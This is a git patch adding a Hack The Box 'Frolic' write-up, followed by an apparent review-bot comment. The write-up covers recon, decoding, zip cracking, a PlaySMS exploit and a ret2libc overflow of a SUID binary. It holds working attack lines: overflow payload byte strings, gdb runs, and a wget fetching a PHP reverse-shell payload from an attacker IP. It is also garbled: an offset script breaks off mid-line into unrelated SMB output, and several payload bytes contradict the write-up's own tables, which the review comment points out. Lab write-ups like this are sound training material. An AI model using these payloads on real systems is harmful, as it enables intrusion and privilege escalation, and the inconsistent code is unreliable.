From 6e4456f8e3162e3b9de9903777684c8a03792e56 Mon Sep 17 00:00:00 2001 From: Dan Goldsmith Date: Thu, 10 Oct 2019 14:45:25 +0100 Subject: [PATCH] Frolic HTB Writup added --- HTB_Writups/Frolic.md | 731 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 731 insertions(+) create mode 100644 HTB_Writups/Frolic.md diff --git a/HTB_Writups/Frolic.md b/HTB_Writups/Frolic.md new file mode 100644 index 0000000..fab4e01 --- /dev/null +++ b/HTB_Writups/Frolic.md 
@@ -0,0 +1,731 @@ +--- +title: Frolic +tags: Linux, Encoding +--- + +# Recon + +Getting a bit more wise to how this works, so simulatinously visit the +web while I start the basic Nmap scanning. However, Interesting, doesnt have a +HTTP interface, so I have to hang about waiting on the scan. + +## NMAP + +~~~ term +dang@dang-laptop ~/Documents/HTB$ nmap -sV 10.10.10.111 +Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-28 22:30 GMT +Nmap scan report for 10.10.10.111 +Host is up (0.17s latency). +Not shown: 996 closed ports +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) +139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) +445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) +9999/tcp open http nginx 1.10.3 (Ubuntu) +Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +Nmap done: 1 IP address (1 host up) scanned in 26.96 seconds +~~~ + +We can visit port 9999 and discuver wha we have an nginx server so it does after all. + +~~~ term +dang@dang-laptop ~$ nmap -A 10.10.10.111 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-04 21:01 GMT +Nmap scan report for 10.10.10.111 +Host is up (0.051s latency). +Not shown: 996 closed ports +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) +| 256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) +|_ 256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) +139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) +445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) +9999/tcp open http nginx 1.10.3 (Ubuntu) +|_http-server-header: nginx/1.10.3 (Ubuntu) +|_http-title: Welcome to nginx! 
+Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Host script results: +|_clock-skew: mean: -1h48m40s, deviation: 3h10m30s, median: 1m18s +|_nbstat: NetBIOS name: FROLIC, NetBIOS user: , NetBIOS MAC: (unknown) +| smb-os-discovery: +| OS: Windows 6.1 (Samba 4.3.11-Ubuntu) +| Computer name: frolic +| NetBIOS computer name: FROLIC\x00 +| Domain name: \x00 +| FQDN: frolic +|_ System time: 2019-03-05T02:32:43+05:30 +| smb-security-mode: +| account_used: guest +| authentication_level: user +| challenge_response: supported +|_ message_signing: disabled (dangerous, but default) +| smb2-security-mode: +| 2.02: +|_ Message signing enabled but not required +| smb2-time: +| date: 2019-03-04 21:02:42 +|_ start_date: N/A + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +Nmap done: 1 IP address (1 host up) scanned in 16.81 seconds +dang@dang-laptop ~$ +~~~ + +## HTTP Enumeration + +Port 9999 is standard page. + +### Nikto + +~~~ +root@kali:~# nikto -host 10.10.10.111 -port 9999 +- Nikto v2.1.6 +--------------------------------------------------------------------------- ++ Target IP: 10.10.10.111 ++ Target Hostname: 10.10.10.111 ++ Target Port: 9999 ++ Start Time: 2019-03-05 15:24:48 (GMT0) +--------------------------------------------------------------------------- ++ Server: nginx/1.10.3 (Ubuntu) ++ Server leaks inodes via ETags, header found with file /, fields: 0x5ba78110 0x27d ++ The anti-clickjacking X-Frame-Options header is not present. ++ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS ++ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type ++ No CGI Directories found (use '-C all' to force check all possible dirs) ++ OSVDB-3092: /admin/: This might be interesting... ++ OSVDB-3092: /backup/: This might be interesting... 
++ /test/: Output from the phpinfo() function was found. ++ OSVDB-3092: /test/: This might be interesting... ++ /test/index.php: Output from the phpinfo() function was found. ++ OSVDB-3233: /test/index.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. ++ /admin/index.html: Admin login page/section found. ++ 7501 requests: 0 error(s) and 11 item(s) reported on remote host ++ End Time: 2019-03-05 15:28:50 (GMT0) (242 seconds) +--------------------------------------------------------------------- +~~~ + +### Dirbuster + +Dirbuster found + - test/ + - backup/ + +~~~ +Dir found: /test/ - 200 +File found: /test/index.php - 200 +Dir found: /admin/css/ - 403 +Dir found: /dev/ - 403 +Dir found: /admin/js/ - 403 +Dir found: /backup/ - 200 +File found: /backup/index.php - 200 +Dir found: /dev/backup/ - 200 +File found: /dev/backup/index.php - 200 + + - Dir found: /loop/ - 403 +Dir found: /backup/loop/ - 403 +Dir found: /loop/loop/ - 403 +Dir found: /backup/loop/loop/ - 403 +Dir found: /loop/loop/loop/ - 403 +Dir found: /backup/loop/loop/loop/ - 403 +Dir found: /loop/loop/loop/loop/ - 403 +Dir found: /backup/loop/loop/loop/loop/ - 403 +~~~ + + +Inside dev/backup we find /playsms +Inside backup we get a username and password + + - admin:imnothuman + +WHICH TURN OUT TO BE SMB CREDS!! However, that lead me a "merry chase" +down the SMB, rabithole. + +### Coninuing the HTTP Enum + +Admin directory lives us a login page. + - Source shows admin and superduperlooperpassword_lol + +Presents http://10.10.10.111:9999/admin/success.html + +Which is + +~~~ term +..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! 
.?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?. +~~~ + + +> NOTE: Got a bit stuck here, Looking on the Froums, this looks like +> it could be BLurb or Ook (Is a Brainfuck Derivitive, and there is a +> clue about fish) + +Converting the code (small python script perpend Ook to each argument, +then run through a onine Ook parser we end up with.. + +~~~ +Nothing here check /asdiSIAJJ0QWE9JAS +~~~ + + +> NOTE: This is where I discovered Cyberchef. Bloody godsend given +> that next bit is all about decoding a silly number of times. + +Navigating there gives us a second message. 
+ +~~~ +UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA +~~~ + +Which with a bit of Faffing, turns out to be a zip file encoded with base 64. +- Which is password encoded. + +WE make use of fcrackzip + +~~~ +user@kali:~$ fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt data.zip + +PASSWORD FOUND!!!!: pw == password +user@kali:~$ +~~~ + +Now we get an index.php file + +~~~ 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 +~~~ + +Which if we convert to ASCII -> Then Base64 we end up with Brainfuck + +Which then translates to + +~~~ +idkwhatispass +~~~ + +This works as creds (with admin) on +http://10.10.10.111:9999/playsms/index.php?app=main&inc=core_welcome + +# Play SMS Exploit + +https://amonsec.net/ctf/dina-ctf-walkthrough +https://www.exploit-db.com/exploits/42003/ + + +## Getting User + +Grab a script from https://github.com/jasperla/CVE-2017-9101 +$ python playsms.py --url http://10.10.10.111:9999/playsms -i + +And I gets user +~~~ term +> cat /home/ayush/user.txt + +2ab95909cf509f85a6f476b59a0c2fe0 +~~~ + + +# Getting Root. + +Standard Enumeration, Look for suid files. This time we find + +~~~ term +-rwsr-xr-x 1 root root 7480 Sep 25 00:59 /home/ayush/.binary/rop +~~~ + +ROP, sounds like a clue. + +## Trying the exploit on my machine +We can copy that acoss by copying to the www directoy, then download. 
+ +Seems like we have an overflow with some ROP based programming, so I can follow along with this + +https://resources.infosecinstitute.com/hack-the-box-htb-machines-walkthrough-series-october/ + + +First Step, determine the buffer overflow + +~~~ term +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ./rop `python2 -c "print 'A' * 1000"` +~~~ + +Or in GDB + +~~~ term +Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A' * 56"` + +Program received signal SIGSEGV, Segmentation fault. +0x41414141 in ?? () +(gdb) +~~~ + +Looks like Grap EIP at 52 Bytes + +~~~ term +Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A' * 52 + 'BBBB'"` + +Program received signal SIGSEGV, Segmentation fault. +0x42424242 in ?? () +(gdb) +~~~ + +We want to follow the basic ROP techingqye of `````` +These will live in libc so we need to find them + +We also know tat they are offset from libc... + +~~~ term +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc + libc.so.6 => /usr/lib32/libc.so.6 (0xf7dad000) +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc + libc.so.6 => /usr/lib32/libc.so.6 (0xf7d15000) +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc + libc.so.6 => /usr/lib32/libc.so.6 (0xf7d14000) +(env) dang@dang-laptop ~/Docume +~~~ + +This is moving around so lets +(Note: To start off with I want to make my life easy, so lets diable ALSR) + +~~~ term +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ cat /proc/sys/kernel/randomize_va_space +2 +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ sudo sysctl kernel.randomize_va_space=0 +~~~ + +Which means Libc is now at 0x7fdc4000 + +~~~ term +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc 1 ↵ + libc.so.6 => /usr/lib32/libc.so.6 (0xf7dc4000) +~~~ + +Lets grab System from libc (NOTE: Dont be a Dick, check the address of Libc) + +~~~ term +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ readelf -s /usr/lib32/libc.so.6| grep 
system + 257: 0012adb0 102 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@GLIBC_2.0 + 657: 0003e8f0 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE + 1524: 0003e8f0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0 + 569: 00000000 0 FILE LOCAL DEFAULT ABS system.c + 570: 0003e3f0 1071 FUNC LOCAL DEFAULT 13 do_system + 5335: 0012adb0 102 FUNC LOCAL DEFAULT 13 __GI_svcerr_systemerr + 6792: 0012adb0 102 FUNC LOCAL DEFAULT 13 __EI_svcerr_systemerr + 7434: 0003e8f0 55 FUNC WEAK DEFAULT 13 system + 7486: 0012adb0 102 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@GLIBC_2. + 8144: 0003e8f0 55 FUNC GLOBAL DEFAULT 13 __libc_system +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ +~~~ + +== ``` 1524: 0003e8f0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0``` + + +Exit + +~~~ term +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ readelf -s /usr/lib32/libc.so.6| grep exit + 121: 00031db0 39 FUNC GLOBAL DEFAULT 13 __cxa_at_quick_exit@@GLIBC_2.10 + 150: 000318e0 33 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0 +~~~ + +And find a call to /bin/sh + +~~~ term +dang@dang-laptop ~/Documents/HTB/Frolic$ strings -a -t x /usr/lib32/libc.so.6 | grep /bin/sh + 17faaa /bin/sh +~~~ + +As these are offset we need to calculate with regard to Libc Address + + - Libc 0xf7dc4000 + + - System 0x45380 + - Exit 0x3a570 + - /bin/sh 0x17faaa + +|------|------------|-------------| +| Sys | 0xf7e028f0 | f7 e0 28 f0 | +| Exit | 0xf7df58e0 | f7 df 58 e0 | +| Sh | 0xf7f43aaa | f7 f4 3a aa | + + + Therefore our overflow becomes + ```<52>``` + + or (Rember Endianness) + + ```python2 -c "print 'A'*52+'\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\xaa\xba\xfb\xf7'"`` + + Which gives me an error of nsorted not found... 
+ + ~~~term + (env) dang@dang-laptop ~/Documents/HTB/Frolic$ ./rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\x19\x85\xf4\xf7' + 'C'*50"` +sh: nsorted: command not found +[+] Message sent: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�(��X���CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC% +~~~ + +> NOTE: Ended up doing this again in GDB. Turns out I was calling out +> to the wrong version of glibc. Live and Learn :( + +## Thying the ROP chain in GDB + +So I can work out what is happeing.. + +Confirm that we control EIP +~~~ term +(gdb) run `python2 -c "print 'A'*52 + 'BBBB'" +~~~ + +Find the call to system and Exit (Which match our other ones) + +~~~ term +Breakpoint 1 at 0x80484aa +(gdb) run +The program being debugged has been started already. +Start it from the beginning? (y or n) y +Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + 'BBBB'"` + +Breakpoint 1, 0x080484aa in main () +(gdb) p system +$1 = {} 0xf7e028f0 +(gdb) + +(gdb) p exit +$2 = {} 0xf7df58e0 +(gdb) +~~~ + +We could then confirm we hit system (at least) + +~~~ term +(gdb) break system +Breakpoint 2 at 0xf7e028f0 +~~~ + + +Without the Mangled Address + +~~~ term +(gdb) run `python2 -c "print 'A'*52 + 'BBBB'"` +Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + 'BBBB'"` + +Breakpoint 1, 0x080484aa in main () +(gdb) continue +Continuing. + +Program received signal SIGSEGV, Segmentation fault. +0x42424242 in ?? () +(gdb) continue +Continuing. + +Program terminated with signal SIGSEGV, Segmentation fault. +The program no longer exists. +(gdb) +~~~ + +And With It + +~~~ term +(gdb) run `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7'"` +Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7'"` + +Breakpoint 1, 0x080484aa in main () +(gdb) continue +Continuing. + +Breakpoint 2, 0xf7e028f0 in system () from /usr/lib32/libc.so.6 +(gdb) continue +Continuing. 
+[Detaching after fork from child process 30400] +sh: $'4\325\377\377X\325\377\377': command not found + +Program received signal SIGSEGV, Segmentation fault. +0xffffd500 in ?? () +(gdb) +~~~ + +Adding Exit + +~~~ term +Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7'"` + +Breakpoint 1, 0x080484aa in main () +(gdb) continue +Continuing. + +Breakpoint 2, 0xf7e028f0 in system () from /usr/lib32/libc.so.6 +(gdb) continue +Continuing. +[Detaching after fork from child process 30405] +sh: $'\323\377\377': command not found +[+] Message sent: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�(��X�[Inferior 1 (process 30403) exited with code 0300] +(gdb) +~~~ + +And grabbing SH from where we guessed it would be. + +f7 f4 3a aa + +~~~ term +(gdb) run `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\xaa\x3a\xf4\xf7'"` +The program being debugged has been started already. +Start it from the beginning? (y or n) y +Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\xaa\x3a\xf4\xf7'"` + +Breakpoint 1, 0x080484aa in main () +(gdb) continue +Continuing. + +Breakpoint 2, 0xf7e028f0 in system () from /usr/lib32/libc.so.6 +(gdb) continue +Continuing. +[Detaching after fork from child process 30938] +sh-5.0$ +~~~ +WOOT!!! + + +## Rooting the Box + + +Firstly the Shell I have been using is a bit fraught, Replace it the +the PHP reverse shell to see if that behaves better. + +Pentest Monkey php reverse shell, Fire up a python webserver and + +~~~ term +> wget 10.10.14.251:8000/dangPayload.php -O plugin/dangPayload.php + +~~~ + +Things behave a bit better. + +Nice that ALSR is turned off + +~~~ term +$ cat /proc/sys/kernel/randomize_va_space +0 +~~~ + +Lets also copy a local version across so I can play without screwing +up the main binary. 
+ +~~~ term +cp /home/ayush/.binary/rop rop +~~~ + +Confirm offset of libc + +~~~ term +$ ldd rop | grep libc + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000) +$ ldd rop | grep libc + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000) +$ +$ ldd /home/ayush/.binary/rop | grep libc + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000) +$ +~~~ + +System + +~~~ term +$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system + 245: 00112f20 68 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.0 + 627: 0003ada0 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE + 1457: 0003ada0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0 +$ +~~~ + +Exit + +~~~ term +$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit + 112: 0002edc0 39 FUNC GLOBAL DEFAULT 13 __cxa_at_quick_exit@@GLIBC_2.10 + 141: 0002e9d0 31 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0 +~~~ + +And SH + +~~~ term +$ strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh + 15ba0b /bin/sh +$ +~~~ + +## Offset Notes + +- Libc /lib/i386-linux-gnu/libc.so.6 0xb7e19000 +- System: 0x0003ada0 +- Exit: 0x0002e9d0 +- Bin Sh: 0x15ba0b + +From the Offset Calc Script + +|------------|------|----------| +| 0xb7e53da0 | 0xb7 | e5 3d a0 | +| 0xb7e479d0 | 0xb7 | e4 79 d0 | +| 0xb7f74a0b | 0xb7 | f7 4a 0b | + + +So Payload is + +```python2 -c "print 'A'*52+'\x0a\x3d\xe5\xb7'+'\xd0\x79\xe4\xb7'+'\x0b\x4a\xf7\xb7'"``` + +We can try this though it doesnt help + +~~~ term +$ ltrace ./dangrop `python2 -c "print 'A'*52+'\x0a\x3d\xe5\xb7\xd0\x79\xe4\xb7\x0b\x4a\xf7\xb7'"` +Segmentation fault (core dumped) +$ +~~~ + +strace ./dangrop `python2 -c "print 'A'*52+'B'"` + +Which I think Gives me what I need as I can confirm EIP. + +~~~ term +--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} --- ++++ killed by SIGSEGV (core dumped) +++ +Segmentation fault (core dumped) +www-data@frolic:/tmp/dg$ +~~~ + + +## Yet more Faffing for Root!!! 
+ +Had to write a script to do the calcs as I was evidently screting something up + +~~~ python +#Set of Libary +""" +- System: 0x0003ada0 +- Exit: 0x0002e9d0 +- Bin Sh: 0x15ba0b +""" + +LIBC = 0xb7e19000 + +SYSTEM = 0x3ada0 +EXIT = 0x2e9d0 +SH = 0x15ba0b + +sysoffset = LIBC + SYSTEM +exitoffset = LIBC + EXIT +shoffset = LIBC + SH + +#print (hex(sysoffset)) +#print (hex(exitoffset)) +#print (hex(shoffset)) + +import struct + +out = "A"*52 +out += struct.pack(" +| Path: C:\tmp +| Anonymous access: READ/WRITE +| Current user access: READ/WRITE +| \\10.10.10.111\print$: +| Type: STYPE_DISKTREE +| Comment: Printer Drivers +| Users: 0 +| Max Users: +| Path: C:\var\lib\samba\printers +| Anonymous access: +|_ Current user access: + +Nmap done: 1 IP address (1 host up) scanned in 3.41 seconds +user@MarbleArch ~ % +~~~ + + +### Manually checking + +First lets enumerate the shares... + +~~~ +user@kali:~$ smbclient -L 10.10.10.111 -n +WARNING: The "syslog" option is deprecated +Enter WORKGROUP\user's password: +OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu] + + Sharename Type Comment + --------- ---- ------- + print$ Disk Printer Drivers + IPC$ IPC IPC Service (frolic server (Samba, Ubuntu)) +OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu] + + Server Comment + --------- ------- + + Workgroup Master + --------- ------- + WORKGROUP +user@kali:~$ +~~~ + + +So the shares with need permissions + +WE can check with (Print is locked down) + +~~~ +user@kali:~$ smbclient //10.10.10.111/IPC$ -N +WARNING: The "syslog" option is deprecated +OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu] +smb: \> +~~~
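Review bot: the target-box payload under "So Payload is" packs system() as `\x0a\x3d\xe5\xb7`, which is 0xb7e53d0a rather than the 0xb7e53da0 given in the table just above it; the low byte should be `\xa0`, i.e. `'A'*52+'\xa0\x3d\xe5\xb7'+'\xd0\x79\xe4\xb7'+'\x0b\x4a\xf7\xb7'`, and that swapped nibble is the obvious reason the ltrace run segfaults instead of reaching system. The same kind of slip sits in the local section: the bullet list gives "System 0x45380" and "Exit 0x3a570" while the readelf output and the address table both use 0x3e8f0 and 0x318e0 (the table is the one that actually matches 0xf7dc4000 + offset, giving 0xf7e028f0 and 0xf7df58e0), and the first local payload writes /bin/sh as `\xaa\xba\xfb\xf7` (0xf7fbbaaa) instead of the table's 0xf7f43aaa, which is what later works in GDB as `\xaa\x3a\xf4\xf7`; the stale bullets should be corrected to the readelf values and the mistyped bytes fixed so the narrative around "wrong version of glibc" does not mislead a reader who copies them. Lastly, the offset-calculation script under "Yet more Faffing for Root!!!" ends at `struct.pack("` and the text jumps straight into smb-enum-shares output with no heading for that SMB material; the rest of the script (the little-endian format string and the final payload output) needs to be in the file, since the text says it was written precisely to get these calculations right, and the SMB section should get its own heading.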